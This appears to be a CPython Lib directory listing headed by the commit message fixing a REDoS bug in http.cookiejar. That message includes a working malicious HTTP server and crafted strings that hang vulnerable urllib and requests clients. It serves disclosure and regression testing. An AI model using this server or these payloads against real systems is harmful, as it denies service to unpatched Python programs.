cpython/Lib
bcaller 1b779bfb85 bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups, the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.
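
The ambiguity can be illustrated with a small timing sketch. It uses the
simplified pattern quoted above and compares it with a hypothetical
single-\s* variant. That variant is an assumption made for illustration and
is not the actual patched LOOSE_HTTP_DATE_RE; the helper name time_match is
likewise invented here. The space counts are kept small so the slow case
still finishes quickly.

```python
import re
import time

# Simplified pattern quoted in the commit message: three adjacent \s* groups.
AMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*\s*\s*)$")
# Hypothetical unambiguous variant, for illustration only (not the real patch).
UNAMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*)$")


def time_match(pattern, n_spaces):
    """Return (match result, elapsed seconds) for an input that cannot match."""
    text = "1-c-1" + " " * n_spaces + "!"
    start = time.perf_counter()
    result = pattern.match(text)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    # Small sizes only: the ambiguous pattern slows down sharply as n grows.
    for n in (50, 100, 200):
        _, slow = time_match(AMBIGUOUS, n)
        _, fast = time_match(UNAMBIGUOUS, n)
        print(f"{n:4d} spaces: ambiguous {slow:.4f}s, unambiguous {fast:.6f}s")
```

Both patterns reject the malicious string and accept the same valid inputs;
only the amount of backtracking before the rejection differs.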

A malicious server can attack any Python program that accesses it by
responding with crafted Set-Cookie headers, e.g.:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.
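
A check of this kind might look like the sketch below. It assumes a patched
interpreter (on a vulnerable one the calls would effectively hang) and goes
through http.cookiejar.http2time, the module's loose date parser. The
function name and the choice of 10**4 spaces are assumptions made for this
example, not taken from the commit.

```python
from http.cookiejar import http2time


def check_loose_date_completes(n_spaces=10**4):
    """Parse two malformed dates padded with a long run of spaces.

    Each string ends in "!" so it can never be a valid date. On a patched
    interpreter both calls return quickly; the point of the check is that
    they return at all.
    """
    spaces = " " * n_spaces
    return [
        http2time("01 Jan 1970" + spaces + "00:00:00 GMT!"),
        http2time("01 Jan 1970 00:00:00" + spaces + "GMT!"),
    ]


if __name__ == "__main__":
    print(check_loose_date_completes())
```

The check asserts nothing about timing; a regression shows up as a test run
that does not finish.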

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

    "444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
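
As a rough way to exercise this path, the string above can be passed to
http.cookiejar.iso2time, which parses ISO-style date strings. The helper
name below is invented for this sketch.

```python
from http.cookiejar import iso2time


def parse_padded_iso_date(n_spaces=2000):
    """Feed iso2time digits, a run of spaces, then a trailing letter."""
    # The trailing "A" means the string is not a valid ISO date.
    return iso2time("444444" + " " * n_spaces + "A")


if __name__ == "__main__":
    print(parse_padded_iso_date())
```
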
2019-11-22 15:22:11 +01:00
asyncio Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
collections bpo-36321: Fix misspelled attribute name in namedtuple() (GH-16858) 2019-10-20 10:19:47 -07:00
concurrent bpo-31783: Fix a race condition creating workers during shutdown (#13171) 2019-06-28 11:54:52 -07:00
ctypes Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
curses [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
dbm bpo-36232: Improve error message on dbm.open() when the db doesn't exist (GH-12060) 2019-04-29 16:23:28 -07:00
distutils bpo-38839: Fix some unused functions in tests (GH-17189) 2019-11-19 11:45:20 -08:00
email bpo-38332: Catch KeyError from unknown cte in encoded-word. (GH-16503) 2019-10-05 09:19:15 -07:00
encodings bpo-34519: Add additional aliases for HP Roman 8 (GH-8956) 2019-09-11 14:08:41 +01:00
ensurepip bpo-37449: Move ensurepip off of pkgutil and to importlib.resources (GH-15109) 2019-09-13 09:01:20 -07:00
html bpo-37328: remove deprecated HTMLParser.unescape (GH-14186) 2019-08-27 11:48:06 +09:00
http bpo-38804: Fix REDoS in http.cookiejar (GH-17157) 2019-11-22 15:22:11 +01:00
idlelib bpo-38636: Fix IDLE tab toggle and file indent width (GH-17008) 2019-11-20 01:18:39 -05:00
importlib Produce cleaner bytecode for 'with' and 'async with' by generating separate code for normal and exceptional paths. (#6641) 2019-11-21 09:11:43 +00:00
json json.tool: use stdin and stdout in default cmdlne arguments (GH-11992) 2019-05-14 18:52:42 +02:00
lib2to3 Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
logging bpo-38781: Clear buffer in MemoryHandler flush (GH-17132) 2019-11-13 09:03:45 +00:00
msilib Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
multiprocessing Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
pydoc_data Python 3.9.0a1 2019-11-19 12:17:21 +01:00
site-packages
sqlite3 bpo-38185: Fixed case-insensitive string comparison in sqlite3.Row indexing. (GH-16190) 2019-09-17 09:20:56 +03:00
test bpo-38804: Fix REDoS in http.cookiejar (GH-17157) 2019-11-22 15:22:11 +01:00
tkinter bpo-38738: Fix formatting of True and False. (GH-17083) 2019-11-12 16:57:03 +02:00
turtledemo Mark files as executable that are meant as scripts. (GH-15354) 2019-09-09 07:16:33 -07:00
unittest bpo-38857: AsyncMock fix for awaitable values and StopIteration fix [3.8] (GH-17269) 2019-11-20 16:27:51 -08:00
urllib Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
venv bpo-38344: Fix syntax in activate.bat (GH-16533) 2019-10-07 14:07:19 -07:00
wsgiref bpo-8138: Initialize wsgiref's SimpleServer as single-threaded (GH-12977) 2019-05-24 20:24:42 +03:00
xml Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
xmlrpc bpo-38786: Add parsing of https links to pydoc (GH-17143) 2019-11-13 18:13:52 +02:00
__future__.py bpo-35526: make __future__.barry_as_FLUFL mandatory for Python 4.0 (#11218) 2018-12-19 08:19:39 -08:00
__phello__.foo.py
_bootlocale.py
_collections_abc.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
_compat_pickle.py bpo-37757: Disallow PEP 572 cases that expose implementation details (GH-15131) 2019-08-25 23:45:40 +10:00
_compression.py
_markupbase.py
_osx_support.py bpo-35257: Avoid leaking LTO linker flags into distutils (GH-10900) 2018-12-19 18:19:01 +01:00
_py_abc.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
_pydecimal.py bpo-36793: Remove unneeded __str__ definitions. (GH-13081) 2019-05-06 22:29:40 +03:00
_pyio.py closes bpo-27805: Ignore ESPIPE in initializing seek of append-mode files. (GH-17112) 2019-11-12 14:51:34 -08:00
_sitebuiltins.py
_strptime.py
_threading_local.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
_weakrefset.py bpo-36949: Implement __repr__ on WeakSet (GH-13415) 2019-05-20 10:01:07 -07:00
abc.py bpo-35609: Remove examples for deprecated decorators in the abc module. (GH-11355) 2018-12-31 09:56:21 +02:00
aifc.py bpo-37320: Remove openfp() of aifc, sunau and wave (GH-14169) 2019-06-18 00:00:24 +02:00
antigravity.py Change the xkcd link in comment over https. (GH-5452) 2018-09-13 22:45:00 -07:00
argparse.py Defer import of shutil which only needed for help and usage (GH-17334) 2019-11-21 22:51:45 -08:00
ast.py bpo-38049: Add command-line interface for the ast module. (GH-15724) 2019-09-09 23:36:13 +03:00
asynchat.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
asyncore.py bpo-15999: Always pass bool instead of int to socket.setblocking(). (GH-15621) 2019-09-01 12:12:52 +03:00
base64.py
bdb.py Fix typos mostly in comments, docs and test names (GH-15209) 2019-08-30 16:21:19 -04:00
binhex.py
bisect.py bpo-38626: Add comment explaining why __lt__ is used. (GH-16978) 2019-10-28 21:38:50 -07:00
bz2.py bpo-35128: Fix spacing issues in warning.warn() messages. (GH-10268) 2018-11-01 12:33:35 +02:00
cProfile.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
calendar.py bpo-28292: Mark calendar.py helper functions as private. (GH-15113) 2019-08-04 13:14:03 -07:00
cgi.py bpo-20504 : in cgi.py, fix bug when a multipart/form-data request has… (#10638) 2019-09-11 12:05:53 +01:00
cgitb.py
chunk.py
cmd.py
code.py
codecs.py bpo-33361: Fix bug with seeking in StreamRecoders (GH-8278) 2019-05-31 22:44:00 +03:00
codeop.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
colorsys.py
compileall.py bpo-38470: Fix test_compileall.test_compile_dir_maxlevels() (GH-16789) 2019-10-15 11:26:13 +02:00
configparser.py fix typo in configparser doc (GH-12154) 2019-03-03 18:23:19 -08:00
contextlib.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
contextvars.py
copy.py
copyreg.py bpo-33138: Change standard error message for non-pickleable and non-copyable types. (GH-6239) 2018-10-31 02:28:07 +02:00
crypt.py closes bpo-38402: Check error of primitive crypt/crypt_r. (GH-16599) 2019-10-07 21:22:17 -07:00
csv.py bpo-27497: Add return value to csv.DictWriter.writeheader (GH-12306) 2019-05-10 03:50:11 +02:00
dataclasses.py bpo-38431: Fix __repr__ method of InitVar to work with typing objects. (GH-16702) 2019-10-13 14:45:36 +03:00
datetime.py bpo-38155: Add __all__ to datetime module (GH-16203) 2019-09-19 14:34:41 +01:00
decimal.py
difflib.py bpo-38738: Fix formatting of True and False. (GH-17083) 2019-11-12 16:57:03 +02:00
dis.py bpo-38115: Deal with invalid bytecode offsets in lnotab (GH-16079) 2019-09-28 07:49:15 -07:00
doctest.py bpo-15999: Clean up of handling boolean arguments. (GH-15610) 2019-09-01 12:16:51 +03:00
enum.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
filecmp.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
fileinput.py bpo-37330: open() no longer accept 'U' in file mode (GH-16959) 2019-10-28 15:40:08 +01:00
fnmatch.py
formatter.py
fractions.py Add a minor `Fraction.__hash__()` optimization (GH-15313) 2019-08-16 21:09:16 -05:00
ftplib.py Enforce PEP 257 conventions in ftplib.py (GH-15604) 2019-09-02 21:21:33 -07:00
functools.py bpo-38565: add new cache_parameters method for lru_cache (GH-16916) 2019-11-11 23:30:18 -08:00
genericpath.py bpo-38807: Add os.PathLike to exception message raised by _check_arg_types (#17160) 2019-11-18 21:54:00 -08:00
getopt.py
getpass.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
gettext.py bpo-36239: Skip comments in gettext infos (GH-12255) 2019-05-09 16:22:15 +02:00
glob.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
gzip.py bpo-28286: Deprecate opening GzipFile for writing implicitly. (GH-16417) 2019-11-16 18:56:57 +02:00
hashlib.py bpo-38153: Normalize hashlib algorithm names (GH-16083) 2019-09-13 14:31:19 +01:00
heapq.py bpo-29984: Improve 'heapq' test coverage (GH-992) 2019-05-31 21:13:57 -07:00
hmac.py bpo-33604: Raise TypeError on missing hmac arg. (GH-16805) 2019-10-17 20:30:42 -07:00
imaplib.py Fix typos in comments, docs and test names (#15018) 2019-07-30 18:16:13 -04:00
imghdr.py
imp.py bpo-37330: open() no longer accept 'U' in file mode (GH-16959) 2019-10-28 15:40:08 +01:00
inspect.py bpo-38478: Correctly handle keyword argument with same name as positional-only parameter (GH-16800) 2019-10-15 12:40:02 +01:00
io.py bpo-36842: Implement PEP 578 (GH-12613) 2019-05-23 08:45:22 -07:00
ipaddress.py bpo-32820: Simplify __format__ implementation for ipaddress. (GH-16378) 2019-09-27 20:02:58 +03:00
keyword.py bpo-36143: Regenerate Lib/keyword.py from the Grammar and Tokens file using pgen (GH-12456) 2019-03-25 22:01:12 +00:00
linecache.py
locale.py bpo-18378: Recognize "UTF-8" as a valid name in locale._parse_localename (GH-14736) 2019-08-29 00:33:52 -04:00
lzma.py
mailbox.py bpo-31522: mailbox.get_string: pass `from_` parameter to `get_bytes` (#9857) 2018-10-18 20:21:47 -04:00
mailcap.py
mimetypes.py bpo-38449: Revert "bpo-22347: Update mimetypes.guess_type to allow oper parsing of URLs (GH-15522)" (GH-16724) 2019-10-11 22:41:35 -07:00
modulefinder.py bpo-37032: Add CodeType.replace() method (GH-13542) 2019-05-24 23:57:23 +02:00
netrc.py
nntplib.py bpo-37390: Add audit event table to documentations (GH-14406) 2019-06-27 10:47:59 -07:00
ntpath.py bpo-38453: Ensure ntpath.realpath correctly resolves relative paths (GH-16967) 2019-11-15 09:49:21 -08:00
nturl2path.py
numbers.py
opcode.py Produce cleaner bytecode for 'with' and 'async with' by generating separate code for normal and exceptional paths. (#6641) 2019-11-21 09:11:43 +00:00
operator.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
optparse.py bpo-34605: Avoid master/slave terms (GH-9101) 2018-09-07 17:30:33 +02:00
os.py closes bpo-25461: Update os.walk() docstring to match the online docs. (GH-11836) 2019-09-10 13:43:58 +01:00
pathlib.py Revert "bpo-38811: Check for presence of os.link method in pathlib. (GH-17170)" (#17219) 2019-11-18 12:26:37 +01:00
pdb.py bpo-38723: Pdb._runscript should use io.open_code() instead of open() (GH-17127) 2019-11-12 14:42:47 -08:00
pickle.py bpo-37210: Fix pure Python pickle when _pickle is unavailable (GH-14016) 2019-06-13 13:58:51 +02:00
pickletools.py bpo-36785: PEP 574 implementation (GH-7076) 2019-05-26 17:10:09 +02:00
pipes.py
pkgutil.py
platform.py bpo-35389: platform.platform() calls libc_ver() without executable (GH-14418) 2019-06-27 09:04:28 +02:00
plistlib.py bpo-36409: Remove old plistlib API deprecated in 3.4 (GH-15615) 2019-09-05 10:11:35 +02:00
poplib.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
posixpath.py bpo-35755: Remove current directory from posixpath.defpath (GH-11586) 2019-04-17 17:05:30 +02:00
pprint.py bpo-37376: pprint support for SimpleNamespace (GH-14318) 2019-06-26 16:13:18 -07:00
profile.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
pstats.py Fix typos in docs and docstrings (GH-13745) 2019-06-03 01:12:33 +02:00
pty.py
py_compile.py bpo-22640: Add silent mode to py_compile.compile() (GH-12976) 2019-05-28 19:29:04 +03:00
pyclbr.py Fix typos in docs and docstrings (GH-13745) 2019-06-03 01:12:33 +02:00
pydoc.py bpo-38786: Add parsing of https links to pydoc (GH-17143) 2019-11-13 18:13:52 +02:00
queue.py bpo-37394: Fix pure Python implementation of the queue module (GH-14351) 2019-06-25 02:53:30 +01:00
quopri.py bpo-15999: Clean up of handling boolean arguments. (GH-15610) 2019-09-01 12:16:51 +03:00
random.py bpo-32554: Deprecate hashing arbitrary types in random.seed() (GH-15382) 2019-08-22 09:19:36 -07:00
re.py bpo-36548: Improve the repr of re flags. (GH-12715) 2019-05-31 10:39:47 +03:00
reprlib.py
rlcompleter.py
runpy.py bpo-38722: Runpy use io.open_code() (GH-17234) 2019-11-18 11:11:13 -08:00
sched.py
secrets.py
selectors.py
shelve.py
shlex.py Add docstring for shlex.split (GH-16740) 2019-10-31 10:23:20 +00:00
shutil.py bpo-38319: Fix shutil._fastcopy_sendfile(): set sendfile() max block size (GH-16491) 2019-10-01 11:40:54 +08:00
signal.py bpo-34282: Fix Enum._convert shadowing members named _convert (GH-8568) 2018-09-12 10:28:53 -07:00
site.py bpo-37369: Fix initialization of sys members when launched via an app container (GH-14428) 2019-06-29 10:34:11 -07:00
smtpd.py bpo-35800: Deprecate smtpd.MailmanProxy (GH-11675) 2019-10-12 10:24:26 -07:00
smtplib.py bpo-38341: Add SMTPNotSupportedError in the exports of smtplib (#16525) 2019-10-04 17:30:58 -07:00
sndhdr.py
socket.py bpo-38319: Fix shutil._fastcopy_sendfile(): set sendfile() max block size (GH-16491) 2019-10-01 11:40:54 +08:00
socketserver.py Fix typo in Lib/socketserver.py (GH-17024) 2019-11-16 19:14:45 +01:00
sre_compile.py Simplify flags checks in sre_compile.py. (GH-9718) 2018-10-05 20:53:45 +03:00
sre_constants.py bpo-36793: Remove unneeded __str__ definitions. (GH-13081) 2019-05-06 22:29:40 +03:00
sre_parse.py bpo-37723: Fix performance regression on regular expression parsing. (GH-15030) 2019-07-31 21:50:39 +03:00
ssl.py bpo-37463: match_hostname requires quad-dotted IPv4 (GH-14499) 2019-07-02 11:39:42 -07:00
stat.py bpo-38109: Add missing constants to Lib/stat.py (GH-16665) 2019-10-10 09:34:46 +02:00
statistics.py bpo-38385: Fix iterator/iterable terminology in statistics docs (GH-17111) 2019-11-11 23:35:06 -08:00
string.py bpo-38208: Simplify string.Template by using __init_subclass__(). (GH-16256) 2019-10-21 09:36:21 +03:00
stringprep.py
struct.py
subprocess.py bpo-38724: Implement subprocess.Popen.__repr__ (GH-17151) 2019-11-17 16:08:31 +02:00
sunau.py bpo-37320: Remove openfp() of aifc, sunau and wave (GH-14169) 2019-06-18 00:00:24 +02:00
symbol.py bpo-35766: Merge typed_ast back into CPython (GH-11645) 2019-01-31 12:40:27 +01:00
symtable.py bpo-34983: Expose symtable.Symbol.is_nonlocal() in the symtable module (GH-9872) 2018-10-20 01:46:00 +01:00
sysconfig.py bpo-38234: test_embed: test pyvenv.cfg and pybuilddir.txt (GH-16366) 2019-09-25 02:10:35 +02:00
tabnanny.py
tarfile.py Add missing docstrings for TarInfo objects (#12555) 2019-03-27 13:16:34 -07:00
telnetlib.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
tempfile.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
textwrap.py bpo-30754: Document textwrap.dedent blank line behavior. (GH-14469) 2019-06-29 21:20:03 -07:00
this.py
threading.py bpo-15999: Clean up of handling boolean arguments. (GH-15610) 2019-09-01 12:16:51 +03:00
timeit.py
token.py bpo-35975: Support parsing earlier minor versions of Python 3 (GH-12086) 2019-03-07 12:38:08 -08:00
tokenize.py bpo-5028: Fix up rest of documentation for tokenize documenting line (GH-13686) 2019-05-30 15:06:32 -07:00
trace.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
traceback.py bpo-37685: Fixed __eq__, __lt__ etc implementations in some classes. (GH-14952) 2019-08-08 08:42:54 +03:00
tracemalloc.py bpo-37961, tracemalloc: add Traceback.total_nframe (GH-15545) 2019-10-15 14:00:16 +02:00
tty.py
turtle.py Fix typos in docs and docstrings (GH-13745) 2019-06-03 01:12:33 +02:00
types.py bpo-37032: Add CodeType.replace() method (GH-13542) 2019-05-24 23:57:23 +02:00
typing.py bpo-37838: get_type_hints for wrapped functions with forward reference (GH-17126) 2019-11-21 17:24:58 +00:00
uu.py bpo-33687: Fix call to os.chmod() in uu.decode() (GH-7282) 2019-01-17 17:15:53 +03:00
uuid.py bpo-28009: Fix uuid.uuid1() and uuid.get_node() on AIX (GH-8672) 2019-09-26 22:43:15 +03:00
warnings.py bpo-35178: Fix warnings._formatwarnmsg() (GH-12033) 2019-03-01 18:17:55 +01:00
wave.py Fix a typo in wave module docstring (GH-17009) 2019-11-04 22:32:10 -06:00
weakref.py bpo-38761: Register WeakSet as a MutableSet (GH-17104) 2019-11-10 20:12:04 -08:00
webbrowser.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
xdrlib.py
zipapp.py
zipfile.py bpo-38635: Simplify decoding the ZIP64 extra field and make it tolerant to extra data. (GH-16988) 2019-11-09 13:13:36 +02:00
zipimport.py bpo-36842: Implement PEP 578 (GH-12613) 2019-05-23 08:45:22 -07:00